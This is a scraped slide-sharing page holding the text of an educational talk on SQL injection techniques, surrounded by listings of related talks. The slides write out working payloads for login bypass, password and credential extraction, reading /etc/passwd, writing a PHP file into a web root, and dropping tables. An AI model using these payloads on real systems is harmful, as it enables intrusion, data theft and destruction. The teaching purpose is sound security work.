Hack through InjectionsHack through Injections
Hack through Injections
 
Defcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injectionDefcon 17-joseph mccray-adv-sql_injection
Defcon 17-joseph mccray-adv-sql_injection
 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
 
Sq li
Sq liSq li
Sq li
 
How "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scannersHow "·$% developers defeat the web vulnerability scanners
How "·$% developers defeat the web vulnerability scanners
 
SQL Injection in PHP
SQL Injection in PHPSQL Injection in PHP
SQL Injection in PHP
 
2014 database - course 3 - PHP and MySQL
2014 database - course 3 - PHP and MySQL2014 database - course 3 - PHP and MySQL
2014 database - course 3 - PHP and MySQL
 
General Principles of Web Security
General Principles of Web SecurityGeneral Principles of Web Security
General Principles of Web Security
 
Sql Injections With Real Life Scenarious
Sql Injections With Real Life ScenariousSql Injections With Real Life Scenarious
Sql Injections With Real Life Scenarious
 
SQL Injection Attacks
SQL Injection AttacksSQL Injection Attacks
SQL Injection Attacks
 
Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009Php & Web Security - PHPXperts 2009
Php & Web Security - PHPXperts 2009
 
Injection flaw teaser
Injection flaw teaserInjection flaw teaser
Injection flaw teaser
 
SQL injection Colombo Cybersecurity Meetup
SQL injection Colombo Cybersecurity MeetupSQL injection Colombo Cybersecurity Meetup
SQL injection Colombo Cybersecurity Meetup
 
Simple web security
Simple web securitySimple web security
Simple web security
 
Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)Sql Injection Attacks(Part1 4)
Sql Injection Attacks(Part1 4)
 
Sql injection
Sql injectionSql injection
Sql injection
 

Plus de Pichaya Morimoto

ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...Pichaya Morimoto
 
Securing and Hacking LINE OA Integration
Securing and Hacking LINE OA IntegrationSecuring and Hacking LINE OA Integration
Securing and Hacking LINE OA IntegrationPichaya Morimoto
 
Docker Plugin For DevSecOps
Docker Plugin For DevSecOpsDocker Plugin For DevSecOps
Docker Plugin For DevSecOpsPichaya Morimoto
 
Mysterious Crypto in Android Biometrics
Mysterious Crypto in Android BiometricsMysterious Crypto in Android Biometrics
Mysterious Crypto in Android BiometricsPichaya Morimoto
 
Web Hacking with Object Deserialization
Web Hacking with Object DeserializationWeb Hacking with Object Deserialization
Web Hacking with Object DeserializationPichaya Morimoto
 
Burp Extender API for Penetration Testing
Burp Extender API for Penetration TestingBurp Extender API for Penetration Testing
Burp Extender API for Penetration TestingPichaya Morimoto
 
Bug Bounty แบบแมว ๆ
Bug Bounty แบบแมว ๆ Bug Bounty แบบแมว ๆ
Bug Bounty แบบแมว ๆ Pichaya Morimoto
 
Pentest 101 @ Mahanakorn Network Research Laboratory
Pentest 101 @ Mahanakorn Network Research LaboratoryPentest 101 @ Mahanakorn Network Research Laboratory
Pentest 101 @ Mahanakorn Network Research LaboratoryPichaya Morimoto
 
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?Pichaya Morimoto
 

Plus de Pichaya Morimoto (9)

ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
ยกระดับศักยภาพของทีม IT Security องค์กรด้วย CTF & Cybersecurity Online Platfo...
 
Securing and Hacking LINE OA Integration
Securing and Hacking LINE OA IntegrationSecuring and Hacking LINE OA Integration
Securing and Hacking LINE OA Integration
 
Docker Plugin For DevSecOps
Docker Plugin For DevSecOpsDocker Plugin For DevSecOps
Docker Plugin For DevSecOps
 
Mysterious Crypto in Android Biometrics
Mysterious Crypto in Android BiometricsMysterious Crypto in Android Biometrics
Mysterious Crypto in Android Biometrics
 
Web Hacking with Object Deserialization
Web Hacking with Object DeserializationWeb Hacking with Object Deserialization
Web Hacking with Object Deserialization
 
Burp Extender API for Penetration Testing
Burp Extender API for Penetration TestingBurp Extender API for Penetration Testing
Burp Extender API for Penetration Testing
 
Bug Bounty แบบแมว ๆ
Bug Bounty แบบแมว ๆ Bug Bounty แบบแมว ๆ
Bug Bounty แบบแมว ๆ
 
Pentest 101 @ Mahanakorn Network Research Laboratory
Pentest 101 @ Mahanakorn Network Research LaboratoryPentest 101 @ Mahanakorn Network Research Laboratory
Pentest 101 @ Mahanakorn Network Research Laboratory
 
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
CTF คืออะไร เรียนแฮก? ลองแฮก? แข่งแฮก?
 

Dernier

UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxUI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxAndreas Kunz
 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanyChristoph Pohl
 
英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作qr0udbr0
 
Post Quantum Cryptography – The Impact on Identity
Post Quantum Cryptography – The Impact on IdentityPost Quantum Cryptography – The Impact on Identity
Post Quantum Cryptography – The Impact on Identityteam-WIBU
 
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company OdishaBalasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odishasmiwainfosol
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtimeandrehoraa
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureDinusha Kumarasiri
 
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...OnePlan Solutions
 
Unveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesUnveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesŁukasz Chruściel
 
Powering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsPowering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsSafe Software
 
Salesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZSalesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZABSYZ Inc
 
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...Akihiro Suda
 
Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)Ahmed Mater
 
Introduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfIntroduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfFerryKemperman
 
Cloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEECloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEEVICTOR MAESTRE RAMIREZ
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsAhmed Mohamed
 
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...confluent
 
How To Manage Restaurant Staff -BTRESTRO
How To Manage Restaurant Staff -BTRESTROHow To Manage Restaurant Staff -BTRESTRO
How To Manage Restaurant Staff -BTRESTROmotivationalword821
 
Odoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 EnterpriseOdoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 Enterprisepreethippts
 
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...Cizo Technology Services
 

Dernier (20)

UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptxUI5ers live - Custom Controls wrapping 3rd-party libs.pptx
UI5ers live - Custom Controls wrapping 3rd-party libs.pptx
 
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte GermanySuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
SuccessFactors 1H 2024 Release - Sneak-Peek by Deloitte Germany
 
英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作
 
Post Quantum Cryptography – The Impact on Identity
Post Quantum Cryptography – The Impact on IdentityPost Quantum Cryptography – The Impact on Identity
Post Quantum Cryptography – The Impact on Identity
 
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company OdishaBalasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
Balasore Best It Company|| Top 10 IT Company || Balasore Software company Odisha
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtime
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with Azure
 
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
Tech Tuesday - Mastering Time Management Unlock the Power of OnePlan's Timesh...
 
Unveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New FeaturesUnveiling the Future: Sylius 2.0 New Features
Unveiling the Future: Sylius 2.0 New Features
 
Powering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data StreamsPowering Real-Time Decisions with Continuous Data Streams
Powering Real-Time Decisions with Continuous Data Streams
 
Salesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZSalesforce Implementation Services PPT By ABSYZ
Salesforce Implementation Services PPT By ABSYZ
 
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
20240415 [Container Plumbing Days] Usernetes Gen2 - Kubernetes in Rootless Do...
 
Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)
 
Introduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfIntroduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdf
 
Cloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEECloud Data Center Network Construction - IEEE
Cloud Data Center Network Construction - IEEE
 
Unveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML DiagramsUnveiling Design Patterns: A Visual Guide with UML Diagrams
Unveiling Design Patterns: A Visual Guide with UML Diagrams
 
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
Catch the Wave: SAP Event-Driven and Data Streaming for the Intelligence Ente...
 
How To Manage Restaurant Staff -BTRESTRO
How To Manage Restaurant Staff -BTRESTROHow To Manage Restaurant Staff -BTRESTRO
How To Manage Restaurant Staff -BTRESTRO
 
Odoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 EnterpriseOdoo 14 - eLearning Module In Odoo 14 Enterprise
Odoo 14 - eLearning Module In Odoo 14 Enterprise
 
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
Global Identity Enrolment and Verification Pro Solution - Cizo Technology Ser...
 

SQL Injection 101 : It is not just about ' or '1'='1 - Pichaya Morimoto

  • 1. SQL Injection 101 It is not just about ' or '1'='1 pichaya@ieee.org fb.com/index.htmli linkedin.com/in/pich4ya Pichaya Morimoto
  • 2. Legal Warning พระราชบัญญัติ ว่าด้วยการกระทำความผิดเกี่ยวกับคอมพิวเตอร์ พ.ศ. ๒๕๕๐ มาตรา 5 ผู้ใดเข้าถึงโดยมิชอบซึ่งระบบคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะและมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 6 เดือน หรือปรับไม่เกิน 10,000 บาท มาตรา 7 ผู้ใดเข้าถึงโดยมิชอบซึ่งข้อมูลคอมพิวเตอร์ที่มีมาตรการป้องกันการเข้าถึงโดยเฉ พาะ และมาตรการนั้นมิได้มีไว้สำหรับตน โทษจำคุกไม่เกิน 2 ปี หรือปรับไม่เกิน 40,000 บาท มาตรา 9 ผู้ใดทำให้เสียหาย ทำลาย แก้ไข เปลี่ยนแปลง หรือเพิ่มเติมไม่ว่าทั้งหมดหรือ บางส่วน ซึ่งข้อมูลคอมพิวเตอร์ของผู้อื่นโดยมิชอบ โทษจำคุกไม่เกิน 5 ปี หรือปรับไม่เกิน 100,000 บาท
  • 3. Overview ★ Anatomy of SQL Injection Attack ★ Injection Techniques ○ B-E-T-U-S ★ Privilege Escalation ○ File & RCE ★ Advanced Attacks ★ Case Studies
  • 4. What is SQL Injection “A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application.” - https://www.owasp.org/index.php/SQL_Injection Web Application User inject a specially crafted SQL as input to manipulate results Application Users via client programs Input Entry Points (Search box, Forms, Article ID, Session ID, HTTP headers etc.) Database
  • 6. Impact on SQL Injection In general, consider SQL Injection a high impact severity. Technical Impacts Business Impacts ★ Data losses ★ Bypass Authentications ★ Denial of access ★ Lead to host takeover ★ All data could be stolen, modified, or deleted. ★ Could your reputation be harmed? * https://www.owasp.org/index.php/Top_10_2013-A1-Injection * https://www.owasp.org/index.php/SQL_Injection
  • 7. Exploitation Complexity 95% 4% 1% Very Hard Lunatic Easy (Required an Expert) (Maze queries, 2nd order, Blind, Complex App Logic, Bypass Filters/WAF etc.) SQL injection with Havij by 3 year old
  • 8. A Ton of Tools ★ Automated SQL injection Tools SQLMap, Havij, BBQSQL, SQLNinja, SQLiX, BobCat, bSQLHacker, bSQLbf, Absinthe, SQLBrute, Squeeza, SQL Power Injector etc. ★ Web Vulnerability Scanner ○ Commercial Acunetix, Netsparker, IBM AppScan,HP Fortify, HP WebInspect, BurpSuite Pro, Qualys WAS etc. ○ Free W3af, Nikto, SkipFish, Vega, OWASP ZAP etc.
  • 9. Tool == Super Easy ?
  • 10. Tool == Super Easy ?
  • 11. Tools there, why learn to SQLi? 1. When tools failed to exploit? 2. False Positive ★ Complex Database Query ★ Complex Application Logic ★ Encodings & Blacklist Filters ★ Post Authen-ed ★ Anti-CSRF Token ★ Non-SELECT statements ★ Programmer is so indy 3. It’s just fun, and sometimes can make good money... In case you are penetration tester, or just a Zero-day hunter ;) Popular websites already scanned by those available tools. It is very challenge, if you can find flaws that overlooked by tools.
  • 12. Quote from a Hacker “แฮกเกอร์ที่เก่งไม่ใช่แฮกเกอร์ที่ แฮกเว็บได้ 1,000 เว็บ แต่เป็น แฮกเกอร์ที่แฮกเว็บเดิมได้ 1,000 ครั้ง โดยที่โดน แพทช์ไปแล้วทุกครั้ง” ตาเล็ก Windows98SE
  • 13. SQL Injection Techniques 1. Boolean-based blind 2. Error-based 3. Time-based blind 4. UNION query-based 5. Stacked queries
  • 14. Boolean-based blind technique ★ Inject SQL string to control result to be TRUE or FALSE using boolean algebra ★ You can determine whether T/F based on analysis of HTTP responses (string/regex/page length/HTTP status) ★ Retrieve arbitrary data: ○ Sub-Queries with “SELECT” + Conditions (CASE-WHEN, IF-THEN)
  • 15. Example of Vulnerable Code User Input TITLE insert into SQL query TRUE case : title = naruto FALSE case : title = abc123
  • 16. Boolean-based blind : Probe ★ title = naruto SQL : SELECT * FROM bookshop WHERE title='naruto' Result : found (TRUE) ★ title = abc123 SQL : SELECT * FROM bookshop WHERE title='abc123' Result : not found (FALSE) ★ title = naruto' and '1'='1 SQL : ..WHERE title='naruto' and '1'='1' Result : found (TRUE) ★ title = naruto' and 1=2-- - SQL : ..WHERE title='naruto' and 1=2-- -' Result : found (FALSE) Insert another TRUE condition connected with ‘AND’ operator MySQL comments -- - # /**/ T & T = T T & F = F
  • 17. Boolean-based blind : Exploit ★ title=naruto' and 'cat'=(if(3>2,'cat','dog'))-- - Result: found (TRUE) ★ title=naruto' and 'cat'=(if(1>5,'cat','dog'))-- - Result: not found (FALSE) ★ title=naruto' and 'cat'= (if(database()='owasp_db','cat','dog'))-- - Result: found (TRUE) ★ title=naruto' and 'cat'= (if(mid(database(),1,1)='a','cat','dog'))-- - Result: not found (not starts with ‘a’) … b … c ... ★ title=naruto' and 'cat'= (if(mid(database(),1,1)='o','cat','dog'))-- - MySQL IF function IF( <condition>, <return when TRUE>, <return when FALSE> ) MySQL substring functions 1. SUBSTRING (str, pos, len) 2. SUBSTR (str, pos, len) 3. MID(str, pos, len) Result: found (starts with ‘o’), then go to next character.
  • 18. Example of Vulnerable Code $email=$_POST['email']; $password=$_POST['password']; $sql="SELECT * FROM users WHERE (email='$email')"; $sql.=" AND (password='$password')"; $result = mysql_query($sql); if(mysql_num_rows($result)){ die(header('location: member.php')); }else{ die(header('HTTP/1.0 401 Unauthorized')); } True (Login successful) HTTP/1.1 302 Found location: member.php False (Login failed) HTTP/1.0 401 Unauthorized Unvalidated User Input Exploit: curl -v http://url/login.php -d "email=a&password=')||(2>'1" … WHERE (email='a') AND (password='')||(2>'1') Always TRUE
  • 19. Boolean-based blind : Exploit password=1' or 2>(if(mid((select password from users),1,1)='a',1,3))-- - HTTP/1.0 401 Unauthorized Char Pos : 1 password=1' or from first record of password column 2>(if(mid((select password from users),1,1)='b',1,3))-- - HTTP/1.0 401 Unauthorized ... password=1' or 2>(if(mid((select password from users),1,1)='t',1,3))-- - HTTP/1.1 302 Found location: member.php If Char Pos 1 equals to ‘a’ then return 1, otherwise return 3 When result is in TRUE case that means 1st char is current value ( ‘t’ )
  • 20. Boolean-based blind : Exploit password=1' or 2>(if(mid((select password from users),2,1)='a',1,3))-- - HTTP/1.0 401 Unauthorized Go To next Repeat steps until you character get all text from the results! Tip: Find length(<query>)
  • 21. Boolean-based blind : Exploit Look for automate way ? if the flaw is not too complicate then we can just switch to SQLMap. But keep in mind, there are A LOT of tricky patterns that tools cannot figure out how to evaluate as TRUE or FALSE, so just write your own script! Faster blind test algorithms: ★ Bisection algorithm (binary search) ★ Bit-shift algorithm ★ Regular Expression search
  • 22. Error-based : Concept ★ Inject specially crafted invalid SQL syntax ★ Ideally, force web application to expose Error Message which contains the injection results ★ Methods depend solely on DBMS ★ Rarely found in production webapps
  • 23. Example of Vulnerable Code function search_book($title){ global $con; $sql = "SELECT * FROM bookshop WHERE title='".$title."'"; $result = mysql_query($sql) or die(mysql_error($con)); if(mysql_num_rows($result)){ return 'found'; }else{ return 'not found'; } Show Database Error Message when query result in an error } $book_title = $_GET['title']; $book_status = search_book($book_title); echo '<h1>Result: '.$book_status.'</h1>';
  • 24. Error-based : Exploit http://url/searchbook.php?title=' and extractvalue(rand(), concat(0x3a, (select concat(user(),database())) ))-- -
  • 25. Error-based : Exploit http://url/searchbook.php?title=' and extractvalue(rand(), concat(0x3a, (select concat_ws(0x3a,email,password) from users limit 2,1) ))-- - Caution Error messages has limit number of allowed length, so what? length() + mid() ;)
  • 26. Time-based blind : Concept ★ Inject valid SQL string to ○ wait for few seconds in TRUE conditions and … ○ longer/shorter delay for FALSE ★ Analysis on response time to determine the result of queries ★ Take long time to get result but very useful to hack completely blind flaws
  • 28. Time-based blind : Exploit newbook.php?title=aaa&author=bbb'+ if(ord(mid((select version()),12,1))>108,sleep(5),sleep(10)))--+- SQL: INSERT INTO bookshop(title,author) values ('aaa','bbb'+if(ord(mid((select version()),12,1)) >108,sleep(5),sleep(10)))-- -') TRUE case : sleep(5) , delay 5 seconds FALSE case : sleep(10), delay 10 seconds Delay 5 seconds
  • 29. Time-based blind : Exploit Write a script to automate the attack ! For example, http://www.blackhatlibrary.net/SQL_injection/mysqli-blindutils/sqli-slee.py
  • 30. Time-based blind : Exploit sleep() executed !
  • 31. UNION query-based : Concept ★ Most popular method found in SQL injection tutorials from Google/YouTube ★ Inject valid SQL string by making the left-side SELECT to be false and then insert “UNION” with another right-side SELECT query using same number of columns contain what you want to fetch.
  • 32. Example of Vulnerable Code Unvalidated parameter ‘author’ pass into SQL query
  • 33. UNION query-based : Exploit Step 1 : Find columns of left SELECT statement using ‘ORDER BY’ http://owasp-sqli.local/showbook.php?author=longcat' order by 1-- - There are column no. 1 - 4 in underlying SELECT query There is no 5th column. If db error msg on, u will see: Unknown column '5' in 'order clause'
  • 34. UNION query-based : Exploit Step 2.1 : We do not need result from 1st SELECT SQL query so discard it with ‘always FALSE’ condition. http://owasp-sqli.local/showbook.php?author=longcat' and 1>2-- - Step 2.2 : Insert 2nd SELECT SQL query separated by UNION http://owasp-sqli.local/showbook.php?author=longcat' and 1>2 UNION select 1,2,3,4-- - Result of “SELECT 1,2,3,4” will replace where the result of 1st SELECT was.
  • 35. UNION query-based : Exploit Exploit : http://owasp-sqli. local/showbook.php ?author=longcat' and 1>2 union select user(),database(),version(), (select group_concat(email, password) from users)--+- Tips: Database Meta Data select database() select table_name from information_schema.tables select column_name from information_schema.columns
  • 36. Stacked Queries : Concept ★ Append another query into the injection ★ Not All DBMS drivers/API support stacked queries ★ Very Effective for MS-SQL, SQLite Attack Scenario: User Input = 123 SQL: SELECT email FROM users where id=123 User Input = 456; DROP table users SQL: ... users where id=456; DROP table users
  • 38. Stacked queries : Exploit
  • 39. Privilege Escalation ★ Read credential from configuration files ★ Create Accessible Web Backdoor ★ Arbitrary OS command execution
  • 40. SQL Injection : Read File Exploit: http://owasp-sqli.local/showbook.php ?author=longcat' and 1>2 union select 1,load_file('/etc/passwd'),3,4--+-
  • 41. SQL Injection : Write File Exploit: http://owasp-sqli.local/showbook.php ?author=longcat' and 1>2 union select 0x3c3f70687020706870696e666f28293b203f3e,null,null,null into outfile '/var/www/owasp-sqli.local/public_html/upload/info.php'--+-
  • 42. SQL Injection : OS CMD Shell 1. Write File > Web Backdoor ( ex. http://youtube.com/watch?v=QIXTPPBfLyI ) 2. Built-in OS command functions / UDF MS-SQL xp_cmdshell
  • 43. Advanced Attacks ★ MySQL Second Order SQL Injection ★ Abusing PHP PDO prepared statements ★ Making a Backdoor with SQLite ★ How a hashed string causes SQL Injection flaw ★ Account Takeover with SQL Truncation Attack ★ CodeIgniter Active Record Bypass
  • 45. Thanks! Need More? Good Resources https://www.owasp.org/index.php/Testing_for_SQL_Injection_(OTG-INPVAL-005) https://www.owasp.org/index.php/Blind_SQL_Injection http://websec.ca/kb/sql_injection https://github.com/sqlmapproject/sqlmap http://www.amazon.com/Injection-Attacks-Defense-Second-Edition/dp/1597499633 Build your own SQL Injection Playground https://github.com/SpiderLabs/MCIR/tree/master/sqlol https://github.com/Audi-1/sqli-labs https://github.com/sqlmapproject/testenv https://www.owasp.org/index. php/OWASP_Broken_Web_Applications_Project https://pentesterlab.com/exercises/web_for_pentester/ https://pentesterlab.com/exercises/from_sqli_to_shell_II/ https://pentesterlab. com/exercises/from_sqli_to_shell_pg_edition/